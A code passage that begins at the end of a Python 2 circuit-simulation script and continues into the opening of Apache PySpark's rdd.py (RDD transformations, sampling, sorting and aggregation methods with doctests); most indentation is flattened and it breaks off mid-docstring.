time_file_data=time_file_data+str(int(con.NODE_DATA[printf_node_index][-1]))+"\t"
else:
time_file_data=time_file_data+str(round(((con.current_time-con.start_time)*1000),1))+"\t"
con.ANALYSIS_DATA.write(time_file_data+"\n")
con.TIME_ANALYSIS_DATA_ARRAY.append(temp_data_print)
con.PLOT_DATA.append(temp_data_plot)
if (con.current_time-con.start_time)>=con.TOTAL_SIMULATION_TIME:
con.end_time=time.clock()
break
if con.PRINT_NODE!=[]:
for display_data in con.TIME_ANALYSIS_DATA_ARRAY:
for data in display_data:
print data,"\t",
print ""
if con.PLOT_NODE!=[]:
pd.plot_nodes()
###########################################################################################################################
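    # Common teardown: clear the run flags so any helper threads exit, report the
    # wall-clock duration, close the analysis file if one was opened, and wait for a
    # final keypress before returning.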
con.clocking_flag=False
con.circuit_simulation_flag=False
con.serial_communication_flag=False
print "-SIMULATION ENDED-"
print "-total simulation time :",((con.end_time-con.start_time)*1000),'ms'
if con.ANALYSIS_DATA!=None:
con.ANALYSIS_DATA.write("\n-SIMULATION ENDED-\n")
con.ANALYSIS_DATA.write("-total simulation time :"+str((con.end_time-con.start_time)*1000)+' ms')
con.ANALYSIS_DATA.close()
_=raw_input()
###########################################################################################################################
main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from base64 import standard_b64encode as b64enc
import copy
from collections import defaultdict
from collections import namedtuple
from itertools import chain, ifilter, imap
import operator
import os
import sys
import shlex
import traceback
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
import warnings
import heapq
from random import Random
from math import sqrt, log
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def _extract_concise_traceback():
"""
    This function returns the traceback info for a callsite: a Callsite
    namedtuple with function name, file name and line number, or None
"""
tb = traceback.extract_stack()
callsite = namedtuple("Callsite", "function file linenum")
if len(tb) == 0:
return None
file, line, module, what = tb[len(tb) - 1]
sparkpath = os.path.dirname(file)
first_spark_frame = len(tb) - 1
for i in range(0, len(tb)):
file, line, fun, what = tb[i]
if file.startswith(sparkpath):
first_spark_frame = i
break
if first_spark_frame == 0:
file, line, fun, what = tb[0]
return callsite(function=fun, file=file, linenum=line)
sfile, sline, sfun, swhat = tb[first_spark_frame]
ufile, uline, ufun, uwhat = tb[first_spark_frame-1]
return callsite(function=sfun, file=ufile, linenum=uline)
_spark_stack_depth = 0
class _JavaStackTrace(object):
def __init__(self, sc):
tb = _extract_concise_traceback()
if tb is not None:
self._traceback = "%s at %s:%s" % (tb.function, tb.file, tb.linenum)
else:
self._traceback = "Error! Could not extract traceback info"
self._context = sc
def __enter__(self):
global _spark_stack_depth
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(self._traceback)
_spark_stack_depth += 1
def __exit__(self, type, value, tb):
global _spark_stack_depth
_spark_stack_depth -= 1
if _spark_stack_depth == 0:
self._context._jsc.setCallSite(None)
class MaxHeapQ(object):
"""
An implementation of MaxHeap.
>>> import pyspark.rdd
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(10)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(5)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> sorted(heap.getElements())
[0, 1, 2, 3, 4]
>>> heap = pyspark.rdd.MaxHeapQ(1)
>>> [heap.insert(i) for i in range(9, -1, -1)]
[None, None, None, None, None, None, None, None, None, None]
>>> heap.getElements()
[0]
"""
def __init__(self, maxsize):
# we start from q[1], this makes calculating children as trivial as 2 * k
self.q = [0]
self.maxsize = maxsize
def _swim(self, k):
while (k > 1) and (self.q[k/2] < self.q[k]):
self._swap(k, k/2)
k = k/2
def _swap(self, i, j):
t = self.q[i]
self.q[i] = self.q[j]
self.q[j] = t
def _sink(self, k):
N = self.size()
while 2 * k <= N:
j = 2 * k
            # Pick the larger of the two children; if the parent is already
            # larger than that child, the heap property holds and we stop.
if j < N and self.q[j] < self.q[j + 1]:
j = j + 1
if(self.q[k] > self.q[j]):
break
self._swap(k, j)
k = j
def size(self):
return len(self.q) - 1
def insert(self, value):
if (self.size()) < self.maxsize:
self.q.append(value)
self._swim(self.size())
else:
self._replaceRoot(value)
def getElements(self):
return self.q[1:]
def _replaceRoot(self, value):
if(self.q[1] > value):
self.q[1] = value
self._sink(1)
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self._jrdd.cache()
return self
def persist(self, storageLevel):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
else:
return None
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(split, iterator): return imap(f, iterator)
return PipelinedRDD(self, func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator): return chain.from_iterable(imap(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator): return f(iterator)
return self.mapPartitionsWithIndex(func)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.splits().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator): return ifilter(f, iterator)
return self.mapPartitions(func)
def distinct(self):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD (relies on numpy and falls back
on default random generator if numpy is unavailable).
>>> sc.parallelize(range(0, 100)).sample(False, 0.1, 2).collect() #doctest: +SKIP
[2, 3, 20, 21, 24, 41, 42, 66, 67, 89, 90, 98]
"""
assert fraction >= 0.0, "Invalid fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD (currently requires
numpy).
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError("Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
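    # Worked example (illustrative numbers): for num=100 out of total=10000 without
    # replacement, fraction = 0.01 and gamma = -log(5e-5)/10000 ~= 9.9e-4, so the
    # returned rate is about 0.01 + 0.00099 + sqrt(0.00099**2 + 2*0.00099*0.01)
    # ~= 0.0155, i.e. roughly 55% above the naive 1% sampling rate.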
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
return rdd
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
return RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda x: (len(x[1][0]) != 0) and (len(x[1][1]) != 0)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer == serializer:
return self
else:
converted = self.map(lambda x: x, preservesPartitioning=True)
converted._jrdd_deserializer = serializer
return converted
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc = lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5), ('little', 4), ('Mary', 1), ('was', 8), ('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
bounds = list()
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
if numPartitions > 1:
rddSize = self.count()
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
            # we have numPartitions many parts but one of them has
# an implicit boundary
for i in range(0, numPartitions - 1):
index = (len(samples) - 1) * (i + 1) / numPartitions
bounds.append(samples[index])
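            # e.g. with numPartitions=3 and 10 sampled keys the cut points are
            # samples[3] and samples[6]; keys beyond the last bound fall into the
            # final, implicit partition.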
def rangePartitionFunc(k):
p = 0
while p < len(bounds) and keyfunc(k) > bounds[p]:
p += 1
if ascending:
return p
else:
return numPartitions-1-p
def mapFunc(iterator):
yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
.mapPartitions(mapFunc,preservesPartitioning=True)
.flatMap(lambda x: x, preservesPartitioning=True))
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator): yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
yield None
self.mapPartitions(processPartition).collect() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
... yield None
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
self.mapPartitions(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with _JavaStackTrace(self.context) as st:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def max(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
43.0
"""
return self.reduce(max)
def min(self):
"""
Find the minimum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
1.0
"""
return self.reduce(min)
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
"""
def topIterator(iterator):
q = []
for k in iterator:
if len(q) < num:
heapq.heappush(q, k)
else:
heapq.heappushpop(q, k)
yield q
def merge(a, b):
return next(topIterator(a + b))
return sorted(self.mapPartitions(topIterator).reduce(merge), reverse=True)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def topNKeyedElems(iterator, key_=None):
q = MaxHeapQ(num)
for k in iterator:
if key_ != None:
k = (key_(k), k)
q.insert(k)
yield q.getElements()
def unKey(x, key_=None):
if key_ != None:
x = [i[1] for i in x]
return x
def merge(a, b):
return next(topNKeyedElems(a + b))
result = self.mapPartitions(lambda i: topNKeyedElems(i, key)).reduce(merge)
return sorted(unKey(result, key), key=key)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.splits().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the first iteration, just
# try all partitions next. Otherwise, interpolate the number
# of partitions we need to try, but overestimate it by 50%.
if len(items) == 0:
numPartsToTry = totalParts - 1
else:
numPartsToTry = int(1.5 * num * partsScanned / len(items))
left = num - len(items)
def takeUpToNumLeft(iterator):
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
self._reserialize(BatchedSerializer(PickleSerializer(),
batchSize))._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
yield x.encode("utf-8")
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
